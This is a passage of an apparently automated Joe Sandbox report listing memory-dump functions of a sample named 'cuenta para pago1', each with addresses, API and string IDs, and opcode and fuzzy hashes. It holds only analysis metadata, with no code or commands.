                                                                                      Function 348C7623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a16bd0abf377a9bc9e9b9cd18ee913d75b627388457ae7a4981b5c22a656f2c
                                                                                      • Instruction ID: fb9297e6270853325d90ed9a13175189510e3c200b6428ef2e9864b208c9531d
                                                                                      • Opcode Fuzzy Hash: 4a16bd0abf377a9bc9e9b9cd18ee913d75b627388457ae7a4981b5c22a656f2c
                                                                                      • Instruction Fuzzy Hash: D86175B5A0164AEFEB08CF7CC480A9DFBB5FF84344F24826AD419A7310DB74AD518B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 38a19a23954a817753f3ba5477037d422cd22e557488259df73bc2e5aa0e297b
                                                                                      • Instruction ID: 1f61185e00988c49f054116f14bccdce3a0d92dcebb2770f0350f349c84f6368
                                                                                      • Opcode Fuzzy Hash: 38a19a23954a817753f3ba5477037d422cd22e557488259df73bc2e5aa0e297b
                                                                                      • Instruction Fuzzy Hash: 174166B5A01708CFEB65DF28C950A4AB7A6FF85354F1082AAC1569B2F0DB34EE41CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C4779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: c00ee9241b0564a26f86dc3a47f6539456d2875665135834c566d9939837b4fb
                                                                                      • Instruction ID: 92ced6f21f8298b02cfceb5d50e588757fb36411b6c23bc29d3f96b8e0bc39e6
                                                                                      • Opcode Fuzzy Hash: c00ee9241b0564a26f86dc3a47f6539456d2875665135834c566d9939837b4fb
                                                                                      • Instruction Fuzzy Hash: FE41D175604345CFE714CF28C894B2AFBEAEF81B50F50462DE952872A1DB70EC85CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348BB420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: cc713b68c6f7032dfb442a1d7d797649d36396c9b74ebf8f835b51cdec2e9a43
                                                                                      • Instruction ID: 3475c573960775149da50910b0810480f655294e7df52de63979de274e410464
                                                                                      • Opcode Fuzzy Hash: cc713b68c6f7032dfb442a1d7d797649d36396c9b74ebf8f835b51cdec2e9a43
                                                                                      • Instruction Fuzzy Hash: 5531F172600608DFDB21DF18C880A5A77A9FF85364F1047A9EE959B7A1CB71ED42CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C56E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: a2291e5f8c38345887d22adef0bdc3eb07601b69b841c1e0d2762d43933add86
                                                                                      • Instruction ID: 5760a9c8d48070e0a11cf29ad1d2582868784399944e3b02121b0496ecf17fd4
                                                                                      • Opcode Fuzzy Hash: a2291e5f8c38345887d22adef0bdc3eb07601b69b841c1e0d2762d43933add86
                                                                                      • Instruction Fuzzy Hash: 6031AC39716A19FFEB469B24CA80A99FBAAFF84250F405255E91097E51DB31EC30CB84
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3496E750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: aa89f895d8de1edd405a7db5a0fca4faf2266e74c7b840bafdbd2e01782ccbac
                                                                                      • Instruction ID: b8d86a4991881f76b183ec0752cd7503dc88fbf8a680e4a31da2177dc8a674bc
                                                                                      • Opcode Fuzzy Hash: aa89f895d8de1edd405a7db5a0fca4faf2266e74c7b840bafdbd2e01782ccbac
                                                                                      • Instruction Fuzzy Hash: 1C3187B5509301DFDB10DF18C44494ABBEAFFDA268F448AAEE4899B211D334ED05CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C3536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: bbe4d3fda0b6f5aff34aa7db658d61446426ef8577ebdb475d8360c4e2c5c352
                                                                                      • Instruction ID: d685c12e1cfb1c4ddd19ca76c34e0cd99be56f30b9414438b0c66ccea6729cd2
                                                                                      • Opcode Fuzzy Hash: bbe4d3fda0b6f5aff34aa7db658d61446426ef8577ebdb475d8360c4e2c5c352
                                                                                      • Instruction Fuzzy Hash: 4A21F0362067009FEB219F08C9C4F1AFBA5EFC1B10F51065DE8810B690CAB0EC4ACF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348B92AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: b5c919edf7d23a9609dc3273c3bd7a3e3cef87f32f8471a686f30108a7261f46
                                                                                      • Instruction ID: 64b688211de9118825cc48f26104f6749269293c21c51db43bd8da1f0c99d120
                                                                                      • Opcode Fuzzy Hash: b5c919edf7d23a9609dc3273c3bd7a3e3cef87f32f8471a686f30108a7261f46
                                                                                      • Instruction Fuzzy Hash: 65F0F032100700AFE7319B58CC04F8ABBFDEF84700F14061CE582932A0C6A0E906CA64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                      • Instruction ID: 8d3a3f42da5eca85b27d725f9d188632a487f957449121f7a6ce0dddec8fd224
                                                                                      • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                      • Instruction Fuzzy Hash: 93611D76D4121DEFEB11CF99C840BDEBBB9AF84754F104299E410AB250DB749E45CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348D02F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #%u
                                                                                      • API String ID: 0-232158463
                                                                                      • Opcode ID: 71589093831b77c4ad062dae34dda3be13771f3ac57ebba653f710f5e1b96c4b
                                                                                      • Instruction ID: 82f5ece0a7c8a1b5d112ebf9edc65f64d159e03b9ad8fe47c3ef4eaefd72a726
                                                                                      • Opcode Fuzzy Hash: 71589093831b77c4ad062dae34dda3be13771f3ac57ebba653f710f5e1b96c4b
                                                                                      • Instruction Fuzzy Hash: F9716871A01209DFEB05CFA8C984FAEB7F8EF09744F144169E911EB255EB74E941CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3494F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                      • Instruction ID: 911a40ecb49178332909b7c2fc4792e0ab1174e2af949fa74dd483d0c828c8e4
                                                                                      • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                      • Instruction Fuzzy Hash: 205199B2605746AFE721CF28C840F6BB7E8FB84754F404A2DB5549B294DBB4ED04CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348DE547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: EXT-
                                                                                      • API String ID: 0-1948896318
                                                                                      • Opcode ID: bdb00a97792ba990fa3b4029ee553032385bedb9d0592a63ff386528c5b367ee
                                                                                      • Instruction ID: ef0b4a98fca184a9e28fcd310401ccf90e9f5e2bf0d4a87aba5c4d1446185da0
                                                                                      • Opcode Fuzzy Hash: bdb00a97792ba990fa3b4029ee553032385bedb9d0592a63ff386528c5b367ee
                                                                                      • Instruction Fuzzy Hash: 4D419D7261A7159FE710CF65DC40B6BB7E8AF8A714F400B2DF588E7180EA74C904CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348F41BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                      • Instruction ID: bf0ccfe4064bff1cc082b9ae4412c6d69f92eb4a39dca5c1e14755295a24f3d3
                                                                                      • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                      • Instruction Fuzzy Hash: BA515A716057109FD320CF69C841A6BB7F8FF48B10F008A2EF9959B6A0E7B4D904CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3493C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: BinaryHash
                                                                                      • API String ID: 0-2202222882
                                                                                      • Opcode ID: 3e0f3231135b40147a9dd7c2441a5182c0f16d706393db8161b569658f86ccff
                                                                                      • Instruction ID: 97ca1159fded8fc1749328b1f3ff90c0273aa43cc2791a70c236f23624b3c268
                                                                                      • Opcode Fuzzy Hash: 3e0f3231135b40147a9dd7c2441a5182c0f16d706393db8161b569658f86ccff
                                                                                      • Instruction Fuzzy Hash: B24133B290152DAFEB21DB60DC84FDEB77CEB45714F0085E5E608AB145DB709E888FA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348F7425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                      • Instruction ID: 38e05ea28b6dd519ebad4715588230306da586ac084b304bb029a68e16ba27e3
                                                                                      • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                      • Instruction Fuzzy Hash: 9C41F275A00619DFEB10CF88D880BBEBBB9FF51705F0046AAE945A7200DB31D841CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348B96E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: 3w3w
                                                                                      • API String ID: 3446177414-4263324190
                                                                                      • Opcode ID: c69d5d8b00955102d660395b088a0c58b777b8cd8e6ca64c88cf470341c2fd19
                                                                                      • Instruction ID: 38af4a9643ccc92bd6bdf0324f3c12f9a514e3a500186a76e5a8e226c524f3fb
                                                                                      • Opcode Fuzzy Hash: c69d5d8b00955102d660395b088a0c58b777b8cd8e6ca64c88cf470341c2fd19
                                                                                      • Instruction Fuzzy Hash: 6A212536600714AFDB21CF188440B1A7BF5EB88B60F120629E9A59B341DB70DD02CFE0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3493C6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: BinaryName
                                                                                      • API String ID: 0-215506332
                                                                                      • Opcode ID: b4a712e7c198c938f2f386f286893fcf3e28f8200a90b90ab2da3a8dc205950d
                                                                                      • Instruction ID: 20ebf47df5bd8d1cdc512ee4c86e057e879b0aa612e011a1d85508fbab4c16df
                                                                                      • Opcode Fuzzy Hash: b4a712e7c198c938f2f386f286893fcf3e28f8200a90b90ab2da3a8dc205950d
                                                                                      • Instruction Fuzzy Hash: 0D31D67BA02A19AFEB15DA58C845E6BB779EBC3720F014529AC12A7250D7709E04C7D0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348EB1E0 Relevance: .6, Instructions: 629COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b244b26ba555983dc9ca6c0f287f38642b4543e44d4744900e2ae5003ea115ce
                                                                                      • Instruction ID: 89d836ab976f354c6847ecf39955d621ba8de14f4a167dcca0cb2d75200cfe98
                                                                                      • Opcode Fuzzy Hash: b244b26ba555983dc9ca6c0f287f38642b4543e44d4744900e2ae5003ea115ce
                                                                                      • Instruction Fuzzy Hash: D5327CB6E01219DFDF14CFA8C880ABEBBB5FF45744F144269E805AB391E7359941CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348D2760 Relevance: .6, Instructions: 605COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 330894ef0c6b65d52f5df9fcb04f4176509c274d6fa64bd98594656eab27bb6e
                                                                                      • Instruction ID: 4013a33a0731729acbdbc114f3810092d38fb7f07e948e3e6cf83e8adf29b54a
                                                                                      • Opcode Fuzzy Hash: 330894ef0c6b65d52f5df9fcb04f4176509c274d6fa64bd98594656eab27bb6e
                                                                                      • Instruction Fuzzy Hash: 0232DE74A00759CFEB24CF69C840BAEBBFABF85744F20412DD4459BA98DB35AD42CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348CD700 Relevance: .3, Instructions: 342COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93df9a6d379c5b16e388dc0018a49f9a914302a6f342529ee8564f036dc945a3
                                                                                      • Instruction ID: c207f10fb7a620465160dd9d6d4b4e7eb6fbfcbcb303a8f763d137973ac32115
                                                                                      • Opcode Fuzzy Hash: 93df9a6d379c5b16e388dc0018a49f9a914302a6f342529ee8564f036dc945a3
                                                                                      • Instruction Fuzzy Hash: 78C1A175A103199FEB24CB69C840BAEF7B5FF88314F54866DE864AB284D774ED41CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 34901763 Relevance: .3, Instructions: 322COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2eed7afb1d203e508ebd31674426e4b1f1dfe457116cd1ed2711c5b39f0979d9
                                                                                      • Instruction ID: 19ed152359e9c726bf6a0d5dd34eca6fa3e5df77600257e652170ddc0483a24b
                                                                                      • Opcode Fuzzy Hash: 2eed7afb1d203e508ebd31674426e4b1f1dfe457116cd1ed2711c5b39f0979d9
                                                                                      • Instruction Fuzzy Hash: 14D1F2B5A01205DFEB51CF68C980B9A7BF9BF49340F1481BAED099B216DB71D905CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348DF380 Relevance: .3, Instructions: 321COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f53c826e6eafbabeae93ab8532c36e7604c1692d3e6fc0481fa32be4b48d6c73
                                                                                      • Instruction ID: 52c5c9243851cdfe2d186de29501a05d8462c559d24c677bdd6bf3a84818f028
                                                                                      • Opcode Fuzzy Hash: f53c826e6eafbabeae93ab8532c36e7604c1692d3e6fc0481fa32be4b48d6c73
                                                                                      • Instruction Fuzzy Hash: 3AC12576A02228CFEB04CF18C4A077977B6FF4A744F554299EA429F391E7309E41DB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C37E4 Relevance: .3, Instructions: 303COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
